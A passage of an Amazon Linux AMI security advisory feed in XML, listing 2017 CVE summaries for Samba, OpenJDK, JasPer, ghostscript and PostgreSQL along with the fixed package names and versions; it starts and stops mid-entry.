CVE-2017-2619 samba: symlink race permits opening files outside share directory
CVE-2016-2126:
A flaw was found in the way Samba handled PAC (Privilege Attribute Certificate) checksums. A remote, authenticated attacker could use this flaw to crash the winbindd process.
1403115:
CVE-2016-2126 samba: Flaws in Kerberos PAC validation can trigger privilege elevation
CVE-2016-2125:
It was found that Samba always requested forwardable tickets when using Kerberos authentication. A service to which Samba authenticated using Kerberos could subsequently use the ticket to impersonate Samba to other services or domain users.
1403114:
CVE-2016-2125 samba: Unconditional privilege delegation to Kerberos servers in trusted realms
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2125" title="" id="CVE-2016-2125" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2126" title="" id="CVE-2016-2126" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-2619" title="" id="CVE-2017-2619" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494" title="" id="CVE-2017-7494" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1270.html" title="" id="RHSA-2017:1270" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-python" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.4.4" release="13.35.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.4.4-13.35.amzn1.noarch.rpm</filename></package><package name="samba" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.4.4" release="13.35.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.4.4-13.35.amzn1.noarch.rpm</filename></package><package name="samba-test-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.4.4-13.35.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-krb5-printing" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-krb5-printing-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-835</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-835: medium priority package update for java-1.7.0-openjdk</title><issued date="2017-06-06 16:33:00" /><updated date="2017-06-06 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3544:
* Newline injection flaws were discovered in FTP and SMTP client implementations in the Networking component in OpenJDK. A remote attacker could possibly use these flaws to manipulate FTP or SMTP connections established by a Java application.
CVE-2017-3539:
* It was discovered that the Security component of OpenJDK did not allow users to restrict the set of algorithms allowed for Jar integrity verification. This flaw could allow an attacker to modify content of the Jar file that used weak signing key or hash algorithm.
CVE-2017-3533:
* Newline injection flaws were discovered in FTP and SMTP client implementations in the Networking component in OpenJDK. A remote attacker could possibly use these flaws to manipulate FTP or SMTP connections established by a Java application.
CVE-2017-3526:
* It was found that the JAXP component of OpenJDK failed to correctly enforce parse tree size limits when parsing XML document. An attacker able to make a Java application parse a specially crafted XML document could use this flaw to make it consume an excessive amount of CPU and memory.
CVE-2017-3511:
* An untrusted library search path flaw was found in the JCE component of OpenJDK. A local attacker could possibly use this flaw to cause a Java application using JCE to load an attacker-controlled library and hence escalate their privileges.
CVE-2017-3509:
* It was discovered that the HTTP client implementation in the Networking component of OpenJDK could cache and re-use an NTLM authenticated connection in a different security context. A remote attacker could possibly use this flaw to make a Java application perform HTTP requests authenticated with credentials of a different user.
CVE-2016-5542:
Note: This updates extends the fix for CVE-2016-5542 released as part of the RHSA-2016:2658 erratum to no longer allow the MD5 hash algorithm during the Jar integrity verification by adding it to the jdk.jar.disabledAlgorithms security property.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3509" title="" id="CVE-2017-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3511" title="" id="CVE-2017-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3526" title="" id="CVE-2017-3526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3533" title="" id="CVE-2017-3533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3539" title="" id="CVE-2017-3539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3544" title="" id="CVE-2017-3544" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1204.html" title="" id="RHSA-2017:1204" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.141-2.6.10.1.73.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-836</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-836: important priority package update for jasper</title><issued date="2017-06-06 16:49:00" /><updated date="2017-07-25 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9600:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9591:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-9583:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9560:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-9394:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9393:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9392:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9391:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9390:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9389:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9388:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9387:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9262:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8885:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8884:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8883:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8693:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8692:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8691:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8690:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8654:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-2116:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-2089:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1867:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1577:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-10251:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1024:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2015-5221:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2015-5203:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5203" title="" id="CVE-2015-5203" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5221" title="" id="CVE-2015-5221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1024" title="" id="CVE-2016-1024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10251" title="" id="CVE-2016-10251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1577" title="" id="CVE-2016-1577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1867" title="" id="CVE-2016-1867" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2089" title="" id="CVE-2016-2089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2116" title="" id="CVE-2016-2116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8654" title="" id="CVE-2016-8654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8690" title="" id="CVE-2016-8690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8691" title="" id="CVE-2016-8691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8692" title="" id="CVE-2016-8692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8693" title="" id="CVE-2016-8693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8883" title="" id="CVE-2016-8883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8884" title="" id="CVE-2016-8884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8885" title="" id="CVE-2016-8885" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9262" title="" id="CVE-2016-9262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9387" title="" id="CVE-2016-9387" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9388" title="" id="CVE-2016-9388" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9389" title="" id="CVE-2016-9389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9390" title="" id="CVE-2016-9390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9391" title="" id="CVE-2016-9391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9392" title="" id="CVE-2016-9392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9393" title="" id="CVE-2016-9393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9394" title="" id="CVE-2016-9394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9560" title="" id="CVE-2016-9560" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9583" title="" id="CVE-2016-9583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9591" title="" id="CVE-2016-9591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9600" title="" id="CVE-2016-9600" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1208.html" title="" id="RHSA-2017:1208" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-debuginfo" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-libs-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-21.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-837</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-837: important priority package update for ghostscript</title><issued date="2017-06-06 16:51:00" /><updated date="2017-06-06 22:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8291:
* It was found that ghostscript did not properly validate the parameters passed to the .rsdparams and .eqproc functions. During its execution, a specially crafted PostScript document could execute code in the context of the ghostscript process, bypassing the -dSAFER protection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8291" title="" id="CVE-2017-8291" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1230.html" title="" id="RHSA-2017:1230" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-23.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-838</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-838: medium priority package update for postgresql92</title><issued date="2017-06-06 16:53:00" /><updated date="2017-06-06 22:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7486:
It was found that the pg_user_mappings view from postgresql could disclose information about user mappings to a foreign database to unprivileged users. An authenticated attacker with USAGE privilege for this mapping could, when querying the view, obtain user mapping data, such as the username and password used to connect to the foreign database.
1448089:
CVE-2017-7486 postgresql: pg_user_mappings view discloses foreign server passwords
CVE-2017-7484:
It was found that some selectivity estimation functions did not check user privileges before providing information from pg_statistic, possibly leaking information. An unprivileged attacker could use this flaw to steal some information from tables they are otherwise not allowed to access.
1448078:
CVE-2017-7484 postgresql: Selectivity estimators bypass SELECT privilege checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7484" title="" id="CVE-2017-7484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7486" title="" id="CVE-2017-7486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-plperl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" 